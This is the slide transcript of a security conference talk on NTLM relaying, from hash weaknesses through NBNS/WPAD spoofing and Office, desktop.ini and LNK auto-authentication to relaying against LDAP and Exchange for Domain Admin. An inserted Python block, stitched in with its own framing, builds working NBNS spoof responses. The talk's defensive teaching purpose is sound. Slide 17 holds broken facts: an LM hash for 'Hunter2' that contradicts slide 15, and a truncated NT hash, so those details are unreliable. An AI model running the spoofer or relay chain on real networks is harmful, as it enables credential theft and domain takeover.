1 OWNED In 60 Seconds From Network Guest to Windows Domain Admin Directed By Zack Dutchess Fasel
2 We Now Present Your Obligatory Intro
3 What's This Talk About? Weaknesses in NTLM auth, specifically NTLM relaying. New techniques to take advantage of these flaws. Ways to externally leverage NTLM relaying. Corporate impact of NTLM relaying. Cool new shiny toolset. Demo? Let's see... ;) Ways to protect yourself and remediate.
4 The Goal?
5 Get Domain Admin (or sensitive data) in 60 seconds or less
6 So Who Are You Zack Fasel on twitter - Codename: Duchess Founder and Managing Partner of Co-Creator and Tech Lead Lead Organizer the party tonight.
8 95 Slides. Let's Get Started
9 So Let's Talk About LM/NTLM
10 The One-Minute Intro To LM/NTLM And All Its Flavors
11 So What Is LM/NTLM? Windows land! Two things under one name: a password hashing scheme, and a network challenge/response authentication protocol.
12 Let's Start With Hashing
13 So Where Do Windows Password Hashes Live? On the local machine: the SAM file (local accounts) and memory (logged-on local accounts and cached domain accounts). On the domain controller (domain accounts).
14 LM? It's Bad, Mmmkay. We all know this, and have for years, but we're reviewing. Password uppercased, null-padded to 14 characters and split into two 7-character chunks. Each 7-byte (56-bit) chunk is expanded to a 64-bit DES key (one parity bit after every 7 bits) and used to DES-encrypt the fixed string "KGS!@#$%"; the two ciphertexts are concatenated. Voilà, hash.
15 LM? It's Bad, Mmmkay. We all know this, and have for years. Hunter2LOL! becomes HUNTER2 / LOL!, hashed independently as 93D1F9EA182DF34B / 20069D7FB184D83A. Each half can be cracked on its own, and a password of 7 characters or fewer leaves the second half as the constant empty-chunk value.
16 So the LaMe Problems? Obviously easy to crack now: uppercase only, two independent 7-character chunks, and no salt, so rainbow tables cover every possibility in the keyspace. Blah blah, old news...
17 So How is NTLM Better? NT hash = MD4(UTF-16LE(Password)). A real hash! Case-preserving, no 7-character split, the whole password goes in at once. Hunter2 / Hunter2: LM 93D1F9EA182DF34B 93D1F9EA182DF34B vs NT DC020E672D09B BC0449B90C7CB. Still unsalted, though, so the same password always gives the same hash.
18 Obtaining Hash...es: pwdump, gsecdump, mimikatz, hashdump in Meterpreter; the list goes on...
19 Oh, There's So Much More! But we only have an hour... well... 50 minutes... or 45 by now...
20 NTLM Network Auth
21 Network Auths: used for various network services. SPNEGO (negotiates the mechanism, normally Kerberos or NTLM), plain text, NTLM, Kerberos.
22 3-Way Handshake, Here It Goes: TYPE 1, TYPE 2, TYPE 3 between CLIENT and SERVER. Type 1 - Let's talk. I support X, Y and Z. Type 2 - I support X, Y and Q. Here's a CHALLENGE (a random nonce, not a salt). Type 3 - I'm Sterling Archer of ISIS. Proof = f(password hash, challenge), plus signature.
23 Type 1 - Let's Nego
24 Type 2 - I Challenge You!!
25 Type 3 - The password is...
26 The Flavors and Flags: LM - uses the weak LM hash. NTLM - uses the NT hash. NTLMv2 - uses the NT hash with an added client challenge (HMAC-MD5, keyed from the NT hash, user name and domain). LMv2 - the same NTLMv2 key with an added client challenge; despite the name it is derived from the NT hash, not the LM hash. NTLM2 session security / signing - we'll talk about that later.
27 So What's the Problem? You know, the security issues...
28 Pass The Hash, Bro: doesn't require knowledge of the password; the password hash itself is what authenticates. Requires existing access to obtain hashes (i.e. local admin).
29 But We've Already Heard about PTH Twice This Con: Mubix's talk and Skip/Chris's talk. But what about doing this with no existing access?
30 We Can Relay the Auth: NTLM authenticates the user to the server, not mutually, so a client will answer any challenge it is handed, from anyone. Remember Types 1 / 2 / 3? So how can we take advantage of this?
31 3-Way Handshake, Here It Goes Again, With an ATTACKER Between CLIENT and SERVER: TYPE 1 - NEGO and TYPE 2 - CHAL are passed through, so the real server's challenge reaches the client, and the client's TYPE 3 - AUTH is forwarded to the server, which accepts it as coming from the client.
32 That's the Background. Everyone should be a Windows auth expert now. I'll be handing out CWAE certifications later.
34 Mid-Talk Checklist: 1) Services capture auth. 2) Auth can be relayed to other services. 3) ... 4) PROFIT
35 MITM? That's Limited... Introducing Windows Integrated Auth
36 AUTH TO ALL THE THINGS: usability, to avoid typing the password in over and over and over and over and over... Windows auto-logs in to things without prompting.
37 So What Ways Do They Auto Auth?
38 HTTP Auto Auth: driven by the local trusted security context (the browser's Intranet zone). In the browser, typically only IE, but it can be enabled in FF/Chrome.
39 How Does Name Lookup Work? c:\windows\system32\drivers\etc\hosts, then DNS (name.sub.domain.tld, name.domain.tld via the suffix search list), then NBNS broadcast.
40 NBNS, You Say? The host broadcasts to the local network looking for name xyz. Spoof responses back (msf aux/spoof/nbns...). Voilà, single-label names auto-auth to you.
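The NBNS spoof on slide 40, as an added example that is neither the speaker's code nor the Metasploit module's: it encodes and decodes NetBIOS names the way RFC 1001/1002 first-level encoding does, parses a name query off the wire, builds the positive response that points the name at the attacker, and, for the defender, extracts (name, address) from any response so a sensor on 137/udp can log who answered for which name. The sample query is constructed inline; the attacker address 10.0.0.5 and the list of names to impersonate are assumptions.

```python
import socket
import struct
from typing import Optional

NB_NAME_QUERY = 0x0020      # QTYPE / RR type "NB" (RFC 1002)
QUERY_FLAGS = 0x0110        # opcode QUERY, broadcast, recursion desired
POSITIVE_RESPONSE = 0x8500  # response, authoritative answer, recursion desired


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: uppercase, space-pad to 15 chars, append the suffix
    byte, then write each nibble as a letter A..P (32 chars total)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return bytes(b for byte in raw for b in (0x41 + (byte >> 4), 0x41 + (byte & 0x0F)))


def decode_netbios_name(encoded: bytes):
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def parse_nbns_query(pkt: bytes) -> Optional[dict]:
    """Return the question of a single-question name query, or None if this is not one."""
    if len(pkt) < 50:
        return None
    tid, flags, qd, an, ns, ar = struct.unpack(">6H", pkt[:12])
    if flags & 0x8000 or qd != 1 or pkt[12] != 32 or pkt[45] != 0:
        return None
    qtype, qclass = struct.unpack(">HH", pkt[46:50])
    if qtype != NB_NAME_QUERY or qclass != 1:
        return None
    name, suffix = decode_netbios_name(pkt[13:45])
    return {"tid": tid, "name": name, "suffix": suffix, "encoded": pkt[13:45]}


def build_nbns_query(name: str, tid: int) -> bytes:
    """Constructed sample of what a Windows host broadcasts to 137/udp for a single-label name."""
    header = struct.pack(">6H", tid, QUERY_FLAGS, 1, 0, 0, 0)
    return header + b"\x20" + encode_netbios_name(name) + b"\x00" + struct.pack(">HH", NB_NAME_QUERY, 1)


def build_nbns_response(query: dict, answer_ip: str, ttl: int = 165) -> bytes:
    """Positive Name Query Response claiming the queried name lives at answer_ip."""
    header = struct.pack(">6H", query["tid"], POSITIVE_RESPONSE, 0, 1, 0, 0)
    rdata = struct.pack(">H", 0x0000) + socket.inet_aton(answer_ip)   # NB_FLAGS: B-node, unique name
    rr = b"\x20" + query["encoded"] + b"\x00" + struct.pack(">HHIH", NB_NAME_QUERY, 1, ttl, len(rdata))
    return header + rr + rdata


def spoof(pkt: bytes, attacker_ip: str, names=("WPAD",)) -> Optional[bytes]:
    """Attacker side: answer only the names we want to impersonate, stay quiet otherwise."""
    q = parse_nbns_query(pkt)
    if q is None or q["name"] not in names:
        return None
    return build_nbns_response(q, attacker_ip)


def parse_nbns_response(pkt: bytes) -> Optional[tuple]:
    """Defender side: (name, ip) from a positive response, so a sensor can record who
    answered for which name. An answer for a name nobody registered is the tell."""
    if len(pkt) < 62:
        return None
    tid, flags, qd, an, ns, ar = struct.unpack(">6H", pkt[:12])
    if not flags & 0x8000 or an < 1 or pkt[12] != 32:
        return None
    name, _ = decode_netbios_name(pkt[13:45])
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[46:56])
    if rtype != NB_NAME_QUERY or rdlen < 6:
        return None
    return name, socket.inet_ntoa(pkt[58:62])


if __name__ == "__main__":
    query = build_nbns_query("wpad", 0xBEEF)            # constructed broadcast from a victim
    answer = spoof(query, "10.0.0.5")                     # assumed attacker address
    print(parse_nbns_response(answer))                   # what a sensor would log
```

A live spoofer binds UDP 137, reads the broadcast, and sends the bytes from `spoof()` back to the query's source address; this block stops at the packet bytes so it runs offline. The defender's parser is the same decoder read from the other side: any `(name, ip)` pair where `ip` is not the registered owner of `name` is a spoof in progress.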
41 So I Have to SE Someone? NOPE. Web Proxy Auto-Detect (WPAD): the client looks up the name wpad for its proxy settings and auto-authenticates to whatever proxy it is handed.
43 So I Have to Use IE? Systems auto-authenticate too! DOMAIN\SYSTEM$ (the machine account) is a member of Domain Computers. Even when no one is at the system.
45 So Only On The Same LAN? Nope. Dynamic DHCP hostnames ;) hostname = hostname.sub.domain.tld. Or DNS poisoning...
46 So HTTP Only? Nope. Let's not forget SMB.
47 Browser Pages
48 But No Go in FF/Chrome
49 Until Now
50 But Chrome Is a PITA
51 How About the Office Suite? Word doc referencing images at UNC paths. Convert an HTML file into a Word doc... voilà! Excel? PowerPoint? Sure :)
52 What Else in Office? How about Outlook's? Yes, it prompts for opening an image... but it works.
53 Let's Extend This Further: desktop.ini files, .lnk files
54 So Internally Only? NOPE! :) SMB doesn't respect the local security context: file://ip.add.re.ss/share/file.ext works over the Internet ;)
55 So Auto Auth via... NBNS spoofing; browser pages / HTML; Office (Word/Excel/PPT/Outlook) docs; desktop.ini / LNK shortcuts
56 So What Can I Relay To?
57 HTTP: NTLM auth for HTTP services
58 SMB: we've been doing this for a while. MS08-068 fixed relaying back to the source host (reflection), not relaying to a different host. SMB RPC permits executing commands / getting a shell, but requires admin access on the target.
59 LDAP: SMB signing is required by default on domain controllers... so what can we relay to on the DC? LDAP doesn't require signing by default! LDAP supports NTLM auth... WIN! Note: can't change passwords unless the connection is SSL/encrypted.
60 Others? There are other things that use NTLM auth and permit further research: Remote Desktop, VPN, Telnet, FTP...
61 So, Internal Only? Lame. Not So Fast...
62 HTTP Externally: SharePoint servers?
63 People needed Mobiles
64 Exchange... Oh, Exchange... RPC (over HTTP), EWS
66 The Pieces Come Together. Let's re-elaborate the impact, though.
67 Give Me Some Scenarios. You bet. Here's 3.
68 Internal Employee: desktop.ini on a network share. Wait for an admin to view the share. The admin auto-authenticates to an SMB share. Relay to servers / LDAP on the domain controller. Promote the user account to Domain Admin, add new users.
69 Rogue WiFi: rogue DNS + proxy / NBNS + WPAD. Relay to other clients on the AP or to EWS. Om nom nom data.
70 External Attacker: social engineering / persistent XSS. Relay to Exchange Web Services or SharePoint.
71 I Heard There's Some Tools. Hey, quit calling me a tool.
72 Existing Tools: smb_relay, Squirtle! There's a lot more.
73 But They Fall Short: relay everything to one destination only; HTTP or SMB servers in separate roles; no payload generation; limited target surface (i.e. get shell).
74 ZackATTACK! Relaying NTLM Like Nobody Else
75 Overall Design Difference: knows who the user is before relaying! Rules to relay to unique destinations based on the user. Utilize limited user access as well as admin.
76 So There's 4 Components: Servers, Clients, Payloads, Rules
77 Servers: SMB, HTTP
78 What's Different? Remember Type 1/2/3? We don't know the user until Type 3, but the challenge is sent in Type 2. How do we know the user, so as to send different users different challenges? Track by IP? Won't work externally. Cookies? Only for HTTP, and not preserved with WPAD. UUID? SMB2 only.